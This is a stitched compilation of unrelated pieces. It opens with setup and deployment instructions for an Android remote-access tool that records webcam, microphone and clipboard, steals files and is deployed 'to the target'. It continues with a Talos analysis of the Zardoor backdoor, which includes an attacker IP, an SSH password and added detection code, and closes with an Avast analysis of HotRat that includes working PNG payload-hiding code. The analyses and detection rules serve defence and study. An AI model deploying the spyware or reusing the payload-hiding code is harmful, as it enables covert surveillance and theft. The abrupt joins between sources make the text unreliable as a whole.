- /start - start pyradm
- /help - help
- /shell - shell commands
- /sc - screenshot
- /download - download a file (absolute path)
- /info - system info
- /ip - public IP address and geolocation
- /ps - process list
- /webcam 5 - record video (seconds)
- /webcam - screenshot from camera
- /fm - file manager (/fm /home or /fm C:\)
- /mic 10 - record audio from mic (seconds)
- /clip - get clipboard data
- Press the download button to fetch a file; send any file as a file attachment to upload it to the target
Move server files to /var/www/html/ and install dependencies

```console
mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web\ socket/
composer install
```

The default credentials are username: android and password: the rastafarian in you. Change them before exposing the server to any network.
Set database credentials in c2-server/.env and web socket/.env
Execute database.sql
Start the web socket server, or deploy it as a service on Linux

```console
php Server/web\ socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
```
Modify /etc/apache2/apache2.conf

```xml
<Directory /var/www/html/c2-server>
    Options -Indexes
    DirectoryIndex app.php
    AllowOverride All
    Require all granted
</Directory>
```
Set the C2 server and web socket server address in client functionality/Utils.java

```java
public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
```

- Compile the APK using Android Studio and deploy it to the target
Cisco Talos discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.”
We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years.
Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence.
At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can only assess the relationship between this new threat actor and those groups with low confidence, because open-source tools can be used by any threat actor and the choice of target does not align with the known objectives of any known China-based threat actor.
Talos discovered an ongoing espionage campaign in May 2023 targeting an Islamic charitable non-profit organization in Saudi Arabia that exfiltrates data approximately twice a month.
The initial access vector is unknown; however, we observed the threat actor executing malware we are calling the “Zardoor” backdoor to gain persistence. We then observed the threat actor establishing C2 using open-source reverse proxy tools such as Fast Reverse Proxy (FRP), sSocks and Venom, a reverse proxy SOCKS5 server-client tool originally developed for penetration testers.
The threat actor customized sSocks to remove its dependency on the Visual C runtime libraries, so the tool relies only on Windows API libraries and can be executed without unexpected runtime errors.
Once a connection was established, the threat actor used Windows Management Instrumentation (WMI) to move laterally and spread the attacker's tools — including Zardoor — by spawning processes on the target system and executing commands received from the C2, as seen in the commands below.
Execution flow of the Zardoor backdoor
To maintain persistence, the attacker deployed a previously unseen backdoor family we have named Zardoor, after the file names “zar32.dll” and “zor32.dll”. “Zar32.dll” is the main backdoor component that communicates with the attacker’s C2, and “zor32.dll” ensures that “zar32.dll” has been properly deployed with admin privileges. Talos could not obtain a sample of the dropper used in this specific campaign. However, we found and analyzed other available samples whose execution sequence and filenames are identical to the activity we observed, and which are possibly related to this attack.
Based on our analysis of these matching samples, the execution sequence has two parts:
The dropper installs and executes the malicious “oci.dll”
The main purpose of this dropper is to configure “msdtc.exe” to load the malicious “oci.dll” payload. Depending on the target OS architecture, the dropper selects either a 32- or 64-bit “oci.dll” and drops it into C:\Windows\System32\. It then attempts to stop the MSDTC service and uses “msdtc.exe” to register the malicious “oci.dll” with admin privileges, via the command msdtc -install.
If the MSDTC service fails to stop, the dropper instead patches the malicious “oci.dll” to remove the strings 1ISSYSTEM and 1ISAUTORUN and saves the patched DLL to %TEMP%\win_oci_41aa0d5.dll. The presence or absence of these strings later determines where “zar32.dll” and “zor32.dll” are written on the victim’s computer.
The dropper then uses rundll32 to execute the patched “oci.dll” with the command C:\Windows\System32\rundll32.exe %TEMP%\win_oci_41aa0d5.dll MainEntry. The patched “oci.dll” extracts “zar32.dll” and “zor32.dll” into the Temp directory and launches “zar32.dll MainEntry” through “rundll32.exe”. The MSDTC service registers the malicious “oci.dll” with the msdtc -install command.
If either of these two paths succeeds, the dropper configures the MSDTC service to load “oci.dll”, and the DLL is executed. Finally, a cleanup batch script is written to %TEMP%\xz330ksdfg.bat; it deletes the dropper and then deletes itself.
Malicious “oci.dll” payload
The malicious loader “oci.dll” contains the backdoor payloads, “zar32.dll” and “zor32.dll” in the resource section. Oci.dll contains two exported functions: ServiceMain() to launch the backdoor module (“zar32.dll”) and DllEntryPoint() to drop the backdoor onto the victim’s machine.
The ServiceMain() export is executed by the MSDTC service and launches the export function MainEntry of “zar32.dll” using “rundll32.exe.”
The DllEntryPoint() function calls DllMain, which determines where to write “zar32.dll” and “zor32.dll” by searching for the strings 1ISSYSTEM and 1ISAUTORUN. If 1ISSYSTEM is found in “zar32.dll”, DllMain drops “zar32.dll” and “zor32.dll” into the System32 directory.
If 1ISSYSTEM is not found, DllMain looks for 1ISAUTORUN and, if it is present, drops the two DLLs into the %userprofile% directory. If neither string is found, DllMain drops them into the %TEMP% directory. After the payloads are saved, each DLL’s export function MainEntry() is launched with “rundll32.exe”.
To execute “zar32.dll”, the “oci.dll” export “ServiceMain()” is executed by “msdtc.exe” which then loads “zar32.dll” using the command: rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry. “Zor32.dll” is subsequently loaded from the same exported method with the command rundll32.exe C:\WINDOWS\system32\zor32.dll MainEntry.
Analysis of the “zar32.dll” and “zor32.dll” backdoor files
“Zar32.dll” is an HTTP/SSL remote access tool (RAT) that is capable of sending encrypted data to the attacker’s C2, executing PE payloads in fileless mode, searching for Session IDs, remote shellcode execution, and updating the C2 IP/hostname or port in memory. “Zar32.dll” contains a hardcoded debug symbol path seen below, and has two export functions: MainEntry() and DllEntryPoint.
Once deployed, “zar32.dll” creates three mutexes named 3e603a07-7b2d-4a15-afef-7e9a0841e4d5, ThreadMutex12453, and rrx_%d, where %d is a random value seeded from the DLL’s execution time. If the mutex 3e603a07-7b2d-4a15-afef-7e9a0841e4d5 already exists, the DLL exits, since that indicates another instance of “zar32.dll” is already running.
To establish a C2 connection, “zar32.dll” needs a program that allows network applications to operate through a SOCKS or HTTPS proxy. The DLL connects to the following URLs:
1.0.0[.]1/index.html
1.0.0[.]2/index.html
1.0.0[.]3/index.htm
These IP addresses belong to Cloudflare’s public DNS service, which also offers DNS over HTTPS; traffic to them may be an attempt to bypass DNS-based detection of the attacker-controlled C2 servers.
“Zar32.dll'' attempts to connect to its C2 server using SSL with the following HTTP User-Agents:
64-bit application: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; Trident/7.0; rv:11.0) like Gecko
32-bit application on 64-bit OS: Mozilla/5.0 (Windows NT <os_majorver>.<os_minorver>; WOW64; Trident/7.0; rv:11.0) like Gecko
Once a connection is successfully established, “zar32.dll” supports the following C2 commands:
Encrypt and send data to C2.
Execute remotely fetched PE payload.
Search for session ID.
(Plugin exit).
Remote shellcode execution.
Delete this RAT.
Update C2 IP (IP/domain_name:port).
Do nothing.
We also observed several dependencies in the malware’s execution routine. If “zar32.dll” is already running when “zor32.dll” is installed, “zor32.dll” runs the MSDTC service installer (msdtc -install).
If “zar32.dll” is not running when “zor32.dll” is installed, “zor32.dll” starts the “msdtc.exe” service and attempts to create a mutex named 6c2711b5-e736-4397-a883-0d181a3f85ae.
Next, “zor32.dll” will check if the “oci.dll” file exists and finish the execution if it does not. If “oci.dll” exists, “zor32.dll” attempts to create another mutex with the name 3e603a07-7b2d-4a15-afef-7e9a0841e4d5. The DLL will exit if the mutex exists, indicating“zar32.dll” is successfully running.
We also identified “zor32.dll” performing checks to maintain persistence if the process has admin privileges using the following procedures:
If the MSDTC service is not running, “zor32.dll” will configure the MSDTC service with the command msdtc -install. If the installation fails, it will keep attempting up to 10 times.
“zor32.dll” attempts to query MSDTC service status and if this fails, it will attempt up to 10 times.
If the MSDTC service is running, “zor32.dll” attempts to stop it. If this fails, it keeps trying, up to 10 times.
If the MSDTC service is not running, “zor32.dll” will start the service.
Scheduled tasks to maintain persistence
For persistence, the threat actor registers the reverse proxies as scheduled tasks so that the proxy runs approximately every 20 minutes and communicates with the attacker’s C2 servers. First, the threat actor checks whether the victim already has scheduled tasks named "KasperskySecurity" or "Microsoft Security Essentialss". The attacker then deletes the legitimate scheduled task and creates a new one with the same name that runs the proxy “msbuildss.exe”.
Talos observed the threat actor in July 2023 storing the remote server’s public key for later use. This lets the threat actor reach the remote Secure Shell (SSH) server and set up remote port forwarding, which allows servers and devices on the internet to reach devices on the private network.
The attacker downloads a private SSH key and saves it as “id_rsa” under c:\users\[Redacted]\.ssh\. The threat actor also saves a “known_hosts” file containing the public keys of the hosts that can be accessed with the private key stored in “id_rsa”.
According to the above commands, the threat actor first downloads the file “2.vbs” and checks its contents to ensure it is the script they intend to execute. “2.vbs” sets up SSH remote port forwarding from port 443 on the victim’s device to port 22 on the attacker’s server, authenticating as root. The script confirms that the forwarding is in place by performing the following steps:
netstat -ano | findstr 70.34 is used to find part of the remote IP address 70[.]34[.]208[.]197.
The executable “shd.exe” initiates an SSH connection using the username root and the password "3My[{BK)Ni8a".
Looks for a port 443 connection on the victim’s device and kills “ssh.exe” and “shd.exe” using the taskkill utility.
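To turn the chain described above into something a SOC can actually test, the following is an added example (not Talos’ code and not a Cisco signature): a handful of process-creation heuristics covering the oci.dll/MSDTC execution flow and its rundll32 MainEntry launches, the reused scheduled-task names for “msbuildss.exe”, and the netstat/findstr and taskkill housekeeping from “2.vbs”. The event records are constructed here in a Sysmon-like shape; the field names (Image, ParentImage, CommandLine) and the sample paths are assumptions, and the SSH housekeeping rule is deliberately a low-fidelity hunting lead rather than an alert.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]  # constructed Sysmon-like process-creation record (field names assumed)

# Scheduled-task names the actor reused for the msbuildss.exe proxy (from the write-up).
HIJACKED_TASK_NAMES = {"kasperskysecurity", "microsoft security essentialss"}


def _image_name(path: str) -> str:
    """Basename of an image path, lower-cased, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rundll32_mainentry(ev: Event) -> bool:
    """rundll32.exe invoking a MainEntry export: how oci.dll, zar32.dll and zor32.dll are launched."""
    return (_image_name(ev["Image"]) == "rundll32.exe"
            and re.search(r"\.dll[\"']?[\s,]+MainEntry\b", ev["CommandLine"], re.I) is not None)


def msdtc_install(ev: Event) -> bool:
    """msdtc -install re-registers the MSDTC service so that the planted oci.dll gets loaded."""
    return (_image_name(ev["Image"]) == "msdtc.exe"
            and re.search(r"(^|\s)-install\b", ev["CommandLine"], re.I) is not None)


def msdtc_spawns_rundll32(ev: Event) -> bool:
    """oci.dll's ServiceMain runs inside msdtc.exe and starts the backdoor through rundll32."""
    return (_image_name(ev["ParentImage"]) == "msdtc.exe"
            and _image_name(ev["Image"]) == "rundll32.exe")


def hijacked_schtask(ev: Event) -> bool:
    """schtasks /create reusing a security-product task name, or any task that runs msbuildss.exe."""
    if _image_name(ev["Image"]) != "schtasks.exe":
        return False
    cmd = ev["CommandLine"]
    if not re.search(r"/create\b", cmd, re.I):
        return False
    m = re.search(r"/tn\s+\"?([^\"/]+?)\"?\s*(?=/|$)", cmd, re.I)
    task_name = m.group(1).strip().lower() if m else ""
    return task_name in HIJACKED_TASK_NAMES or "msbuildss.exe" in cmd.lower()


def ssh_tunnel_housekeeping(ev: Event) -> bool:
    """Low-fidelity lead: netstat piped to findstr (2.vbs checks for the attacker IP this way),
    taskkill against ssh.exe/shd.exe, or shd.exe itself, the binary that opens the SSH session."""
    cmd = ev["CommandLine"].lower()
    image = _image_name(ev["Image"])
    return (("netstat" in cmd and "findstr" in cmd)
            or (image == "taskkill.exe" and re.search(r"\b(ssh|shd)\.exe\b", cmd) is not None)
            or image == "shd.exe")


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("rundll32_mainentry", rundll32_mainentry),
    ("msdtc_install", msdtc_install),
    ("msdtc_spawns_rundll32", msdtc_spawns_rundll32),
    ("hijacked_schtask", hijacked_schtask),
    ("ssh_tunnel_housekeeping", ssh_tunnel_housekeeping),
]


def evaluate(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule_name, event_id) for every rule each event triggers."""
    return [(name, ev["Id"]) for ev in events for name, pred in RULES if pred(ev)]


# Constructed sample events mirroring the chain in the write-up (not captured telemetry).
SAMPLE_EVENTS: List[Event] = [
    {"Id": "1", "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Users\victim\dropper.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Users\victim\AppData\Local\Temp\win_oci_41aa0d5.dll MainEntry"},
    {"Id": "2", "Image": r"C:\Windows\System32\msdtc.exe", "ParentImage": r"C:\Users\victim\dropper.exe",
     "CommandLine": "msdtc -install"},
    {"Id": "3", "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\msdtc.exe",
     "CommandLine": r"rundll32.exe C:\WINDOWS\system32\zar32.dll MainEntry"},
    {"Id": "4", "Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /create /tn "Microsoft Security Essentialss" /tr C:\Users\victim\msbuildss.exe /sc minute /mo 20 /f'},
    {"Id": "5", "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "cmd /c netstat -ano | findstr 70.34"},
    {"Id": "6", "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},  # benign rundll32 use: no MainEntry
]

if __name__ == "__main__":
    for rule, event_id in evaluate(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The MainEntry and msdtc-parent rules are the high-signal ones: legitimate software almost never launches a DLL export called MainEntry through rundll32, and msdtc.exe spawning rundll32.exe has no normal reason to happen. The scheduled-task rule catches both the name reuse and the proxy binary, so a renamed task still fires.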
Reverse proxy tools used by the threat actor
Forward proxies connect devices on a private network to internet services, usually HTTP-based. Reverse proxies do the opposite: a computer on the private network creates an outbound tunnel to a host on the internet, which then provides remote access to services on the private network.
Reverse proxies are often used legitimately as load balancers in complex system and application architectures. Malicious actors, however, use them to reach otherwise unreachable systems such as RDP servers, domain controllers, and file or database servers.
Fast Reverse Proxy (FRP)
Fast Reverse Proxy (FRP) is a reverse proxy tool that makes network services, typically located behind a NAT or firewall, remotely accessible. FRP consists of two main components: the FRP client and the FRP server. The client, running on the machine behind the NAT, opens an outbound connection to the server; the server listens on public ports and tunnels incoming connections back over that channel to the local services the client exposes. This makes applications running on devices behind the NAT or firewall reachable from the outside network.
The FRP server listens on port 7000 by default, but both ends can be configured to use other ports. A basic setup installs the FRP server on a host with a public IP address and the FRP client on the machine to be exposed; client and server are each configured through an INI file. Once both are configured and started, services on the client machine are reachable via the server’s public IP and the configured remote ports.
Fast Reverse Proxy (FRP) has been reported to be used by several, predominantly Chinese threat actors to bypass network security measures and maintain persistence within a compromised network. By leveraging FRP, these threat actors can create a tunnel from a machine within the compromised network to an external server under their control. This allows them to exfiltrate data, deploy additional malicious tools, or carry out other activities while evading detection.
Because FRP is a legitimate and widely used tool, its traffic is harder to distinguish from normal network traffic, which increases the stealth of the attack. Conversely, the presence of an FRP client in an environment where FRP is not normally used is a good indicator of potential compromise.
FRP is a popular tool and has been increasingly used by threat actors, based on the increase in VirusTotal submissions of FRP tools over the past few years.
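Because FRP configuration is plain INI, an frpc.ini recovered from a compromised host tells a responder exactly what was exposed. The following is an added example (not Talos’ code and not FRP’s own tooling) that parses such a file and summarises the server it calls home to and every service it publishes. The sample configuration is constructed with documentation-range placeholder addresses, not indicators from this campaign; the section and key names (server_addr, server_port, local_ip, local_port, remote_port, plugin) follow FRP’s INI client format.

```python
import configparser
from typing import Dict, List, Optional

# Constructed sample frpc.ini, shaped like an FRP client config found on a host.
# The addresses are documentation placeholders, not indicators from the campaign.
SAMPLE_FRPC_INI = """\
[common]
server_addr = 203.0.113.10
server_port = 7000
token = example-token

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 6000

[dc-smb]
type = tcp
local_ip = 10.0.0.5
local_port = 445
remote_port = 6001

[socks]
type = tcp
remote_port = 6002
plugin = socks5
"""


def parse_frpc(text: str) -> Dict[str, object]:
    """Parse an FRP client INI into the server it connects to and the services it exposes."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    common = cfg["common"] if cfg.has_section("common") else {}
    server = {"addr": common.get("server_addr", ""),
              "port": int(common.get("server_port", "7000"))}  # 7000 is FRP's default
    proxies: List[Dict[str, object]] = []
    for section in cfg.sections():
        if section == "common":
            continue
        p = cfg[section]
        if p.get("plugin"):  # plugin proxies (e.g. socks5) have no fixed local target
            target = f"plugin:{p['plugin']}"
        else:
            target = f"{p.get('local_ip', '127.0.0.1')}:{p.get('local_port', '?')}"
        remote: Optional[int] = int(p["remote_port"]) if p.get("remote_port") else None
        proxies.append({"name": section, "type": p.get("type", "tcp"),
                        "target": target, "remote_port": remote})
    return {"server": server, "proxies": proxies}


def summarize(parsed: Dict[str, object]) -> List[str]:
    """One line per exposed service: where on the internet it is reachable, and what it reaches."""
    srv = parsed["server"]
    lines = []
    for p in parsed["proxies"]:
        rp = p["remote_port"] if p["remote_port"] is not None else "server-assigned"
        lines.append(f"{srv['addr']}:{rp} -> {p['target']} ({p['name']}, {p['type']})")
    return lines


if __name__ == "__main__":
    for line in summarize(parse_frpc(SAMPLE_FRPC_INI)):
        print(line)
```

The server_addr and server_port pair is the network indicator to block and pivot on; each proxy section names an internal service (here RDP on the host itself and SMB on a domain controller) that the attacker could reach from the FRP server’s public ports, which is what the “otherwise unreachable systems” above refers to in practice.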
Venom proxy
Venom is a multi-hop proxy designed for red teaming and pentesting written in the Go language. It allows the user to create a network of proxy nodes that can act as an admin or agent. The agent connects to either another agent or the admin node. The user controls the network through the control of the administration node and can easily add additional agents to the network.
Venom allows the user, which could also be a malicious actor, to create a botnet of proxies that can be used to remotely control the nodes, exfiltrate data, install additional payloads, etc.
The Venom features are:
Multi-hop socks5 proxy.
Multi-hop port forwarding.
SSH tunneling.
Interactive shell.
Uploading and downloading files.
Network traffic encryption.
Support of multiple platforms (Linux/Windows/MacOS) and multiple architectures (x86/x64/ARM/MIPS).
Other reverse proxy tools and their usage by threat actors
In addition to FRP and Venom, threat actors, predominantly originating from China according to previous Talos research and available open-source threat intelligence, use several other tools that support reverse proxying, most commonly:
We have also created a matrix that displays the active threat groups and the proxy tools they are using. Talos assesses with low confidence that the existence of one or more of the tools on a compromised system may indicate the activity of a particular group, as these tools are easily reusable and can be employed by any malicious actor.
Zardoor attacks conducted by an advanced threat actor
Talos assesses this campaign was conducted by an unknown, advanced threat actor. We have not been able to attribute the activity to any known, publicly reported threat actor at this time, as we found no overlap between the tools or C2 infrastructure observed in this campaign and those of known actors.
The threat actor appears highly skilled based on their ability to create new tooling, such as the Zardoor backdoors, customize open-source proxy tools, and leverage several LoLBins including “msdtc.exe” to evade detection. In particular, side-loading backdoors contained in “oci.dll” via MSDTC is a very effective method of remaining undetected while maintaining long-term access to a victim’s network.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.
Cisco Secure Malware Analytics (formerly Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are 61913, 61914 and 62371 - 62380.
The following ClamAV signatures have been released to detect malware artifacts related to this threat:
Win.Backdoor.Zardoor-10019732-0
Win.Backdoor.ZardoorVMP-10019731-0
Win.Backdoor.sSocksProxy-10019733-0
Win.Backdoor.VenomProxy-10019734-0
MITRE ATT&CK Techniques
Command and Control
T1090.003 Proxy: Multi-hop Proxy
T1105 Ingress Tool Transfer
Discovery
T1018 Remote System Discovery
T1033 System Owner/User Discovery
T1049 System Network Connections Discovery
Despite the substantial risks involved, the temptation to obtain high-quality software at no cost persists, and many people download pirated software. Distributing such software therefore remains an effective way to spread malware widely. This analysis shows that cracked software often contains hidden scripts that deploy the attackers’ malware on victims’ computers, and sometimes carries additional malware itself.
We focus on an AutoHotkey script attached to pre-cracked software. The script triggers the deployment of a variant of AsyncRAT that we have named HotRat. The first step of the deployment requires administrative rights; since cracked software often asks for elevated privileges by default, victims do not find the request suspicious. The deployment then weakens system security by disabling antivirus protection before installing HotRat on the victim’s machine.
HotRat malware equips attackers with a wide array of capabilities, such as stealing login credentials, cryptocurrency wallets, screen capturing, keylogging, installing more malware, and gaining access to or altering clipboard data. Our research underscores the importance of steering clear of unauthorized software downloads and emphasizes the vast risks tied to these actions, including multiple malware infections and the potential leak of sensitive information. We advise sourcing software from legitimate and approved providers as it ensures safety, legality, and continuous support. Users should also uphold system security measures, like antivirus programs, to safeguard against these evolving cyber threats.
Weaponization and Delivery
Threat actors take cracks available online through torrent sites or suspicious web pages and attach a malicious AutoHotkey script, compiled into an executable that carries the same icon as the hijacked crack. The script is compiled with the Ahk2Exe compiler (version 1.1.36.00). The resulting executable runs through several stages that ultimately deploy a .NET implementation of AsyncRAT we have named HotRat, including its persistence.
This mode of infection has been seen in various types of cracked software, and it can theoretically be inserted into both illegal and legal software installers. The most commonly affected group is typically Adobe (Illustrator, Master Collection, Photoshop) and Microsoft (Office, Windows) software. The second group primarily consists of video games such as Battlefield 3, Age of Empires IV, Red Alert 2, and The Sims 4. Lastly, the final significant group is composed of premium software used as system and development tools (e.g., IObit Driver Booster, VMware Workstation, Revo Uninstaller Pro, etc.).
Installation
The installation process involves multiple stages, as depicted in Figure 1, to deploy the final HotRat malware and ensure its persistence on the infected system. It begins with a stripped-down version of an expected cracked software setup. The only function of this setup is to initiate a malicious AutoHotkey script. Interestingly, the setup shares the same icon and metadata as the expected software. There’s also a separate folder containing malicious materials alongside the expected software to be “cracked”.
The AutoHotkey script first launches the original setup of the targeted software, providing the illusion of a benign installation process. However, a PowerShell script concealed in PowerPoint.xml runs simultaneously, aiming to weaken system security, specifically by:
Disabling the Consent Admin, enabling operations requiring elevation to be performed without consent or credentials.
The Task Scheduler is used to maintain the malware’s persistence on the infected system. The embedded script creates a new task with a deliberate typo in its name (“administartor”) that executes a VBS Loader every two minutes. An example of this scheduled task is:
Additionally, the embedded script adds the process name RegAsm.exe to the Windows Defender Exclusion list because this process is exploited for injecting the payload, as described later.
The final operation within the embedded script processing involves the activation of a .NET Extractor. This extractor unpacks malicious files – including the final HotRat payload and support files – into a persistence folder. The script utilizes the Reflection.Assembly method to trigger a UAC method, as exemplified here:
The .NET Extractor has another crucial function beyond just unpacking malicious files. The malware authors detect the most frequently used antivirus software and attempt to deactivate them using IObit Unlocker. The persistence folder also contains IObit files capable of deleting system and protected files via the IObit driver. Finally, the extractor uses a straightforward command to remove folders of the detected antivirus software, as demonstrated here:
IObitUnlocker.exe /Delete <av_folder>
Once the embedded script is successfully executed, all necessary files are prepared for deploying the final HotRat payload. This is accomplished using the VBS Loader, which is run by the previously scheduled task.
HotRat Deployment
Once the scheduled task is set up and any detected AVs are deactivated, the task periodically runs the VBS Loader, which step by step deobfuscates and injects the final HotRat payload, as Figure 2 shows.
VBS Loader
The persistence folder usually contains a VBS script file registered in the scheduled task, which is the entry point of the deployment process, plus a few other files used to obfuscate the final payload. For completeness, these are the persistence folder paths observed so far:
C:\ProgramData\Microsoft\IObitUnlocker
$env:USERPROFILE\AppData\Roaming\IObitUnlocker
$env:USERPROFILE\AppData\Roaming\PerfLogs
C:\ProgramData\PerfLogs
C:\ProgramData\Data
The VBS Loader script only executes a PS1 script in the same persistence folder, typically named Report.ps1. This PS1 script, the PS Loader, extracts two .NET executables from PNG files in the same folder using PNG steganography. The PNG files carry no meaningful image content: each is a single row of pixels in varying shades of red.
The current steganography implements a simple method of extracting useful bytes from each red pixel as follows:
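Avast’s extraction snippet is not reproduced on this page. As an added illustration (not Avast’s code and not HotRat’s own routine), the following models the scheme with the Python standard library only: a payload is written as a one-pixel-high RGB PNG with one byte per pixel in the red channel, and read back by walking the PNG chunks and taking the red sample of each pixel. The four-byte length prefix and the zeroed green and blue channels are assumptions of this example; HotRat’s exact pixel layout is not described here.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def embed_payload(payload: bytes) -> bytes:
    """Write payload into a 1-pixel-high 8-bit RGB PNG, one byte per pixel in the red channel.
    The first four pixels carry a big-endian length prefix (this example's layout, not HotRat's)."""
    body = struct.pack(">I", len(payload)) + payload
    # Scanline = filter byte 0 (no filtering) followed by R,G,B for every pixel.
    scanline = b"\x00" + b"".join(bytes((b, 0, 0)) for b in body)
    ihdr = struct.pack(">IIBBBBB", len(body), 1, 8, 2, 0, 0, 0)  # width, height 1, depth 8, RGB
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


def _chunks(png: bytes):
    """Iterate (type, data) over the chunks of a PNG byte string."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        yield ctype, png[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + data + 4 CRC


def red_channel(png: bytes) -> bytes:
    """Return the red sample of every pixel in the single scanline."""
    idat = b""
    width = None
    for ctype, data in _chunks(png):
        if ctype == b"IHDR":
            width, height, depth, color = struct.unpack(">IIBB", data[:10])
            if (height, depth, color) != (1, 8, 2):
                raise ValueError("expected a single-row 8-bit RGB image")
        elif ctype == b"IDAT":
            idat += data  # IDAT may be split; concatenate before inflating
    raw = zlib.decompress(idat)
    if raw[0] != 0:
        raise ValueError("only unfiltered scanlines are handled here")
    reds = raw[1::3]  # skip the filter byte, then every third byte is a red sample
    if width is None or len(reds) != width:
        raise ValueError("scanline length does not match IHDR width")
    return reds


def extract_payload(png: bytes) -> bytes:
    """Inverse of embed_payload: length prefix from the first four reds, then the payload."""
    reds = red_channel(png)
    (length,) = struct.unpack(">I", reds[:4])
    if length > len(reds) - 4:
        raise ValueError("length prefix exceeds image width")
    return reds[4:4 + length]


if __name__ == "__main__":
    sample = b"MZ\x90\x00" + b"constructed stand-in for a .NET executable"
    png = embed_payload(sample)
    assert extract_payload(png) == sample
    print(f"{len(png)} PNG bytes carry {len(sample)} payload bytes")
```

A real extractor would normally read the image with Pillow; a stdlib PNG reader is used here so the example runs anywhere, and it only handles the unfiltered scanline it writes itself. The point for detection is that such a file is a valid PNG that decodes to an all-red strip whose width equals the payload length, which is easy to flag: a 1-pixel-high image tens of thousands of pixels wide is not a picture.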
The first file, Image.png, contains the final HotRat payload, which is injected into the host process (RegAsm.exe) by a .NET injector hidden in the second file, pe.png. The injector is a simple .NET application with a single method:
void Execute(string processPath, byte[] payload)
and the host process path is hardcoded in PS Loader as follows:
Once the process is successfully injected, the HotRat is active, identified AVs are turned off, and persistence is established in the infected system.
HotRat Malware
The final payload, which we call HotRat, derives from the open-source AsyncRAT implementation. The malware authors extended it with new functions to steal various personal information and credentials, and it can deploy other malware, making HotRat a comprehensive RAT. We identified around 20 newly implemented commands. Most are realized as a payload service: the attacker sends a command together with a zipped .NET payload, which is executed, and the results are sent back to the C2. The entry point for each such command is a method called PL, as Figure 3 shows.
We have not captured any of these .NET payloads yet, so for those commands we can only infer the function from the command name. Other commands are implemented directly, so their functionality can be described. Table 1 lists the identified commands and their purpose.
| Command | Description |
| --- | --- |
| anydesk | Steal AnyDesk credentials (NOT CONFIRMED) |
| Avast | Remove Avast Antivirus (NOT CONFIRMED) |
| backproxy | Set up the backproxy (NOT CONFIRMED) |
| DicordTokens | Steal Discord tokens (NOT CONFIRMED) |
| getscreen | Take a screenshot (NOT CONFIRMED) |
| gettxt | Send the current clipboard text |
| KillProxy | Kill the backproxy (NOT CONFIRMED) |
| killps | Kill a specific process |
| klget | Send the keylogger log to C2 (stored in %Temp%\Log.tmp) |
| Net35 | Install the .NET Framework redistributable (NOT CONFIRMED) |
| passload | Unknown |
| pong | C2 server’s response to the ping command |
| ResetScale | Reset display scaling |
| savePlugin | Save a plugin to the victim machine |
| setxt | Set a specific text into the clipboard |
| uacoff | Switch UAC off (NOT CONFIRMED) |
| Wallets | Steal crypto wallets (NOT CONFIRMED) |
| WDExclusion | Add an exclusion to Windows Defender (NOT CONFIRMED) |
| WebBrowserPass | Steal stored passwords from web browsers (NOT CONFIRMED) |
| weburl | Download an executable from a URL and execute it |

Table 1. HotRat command summary
C2 Servers
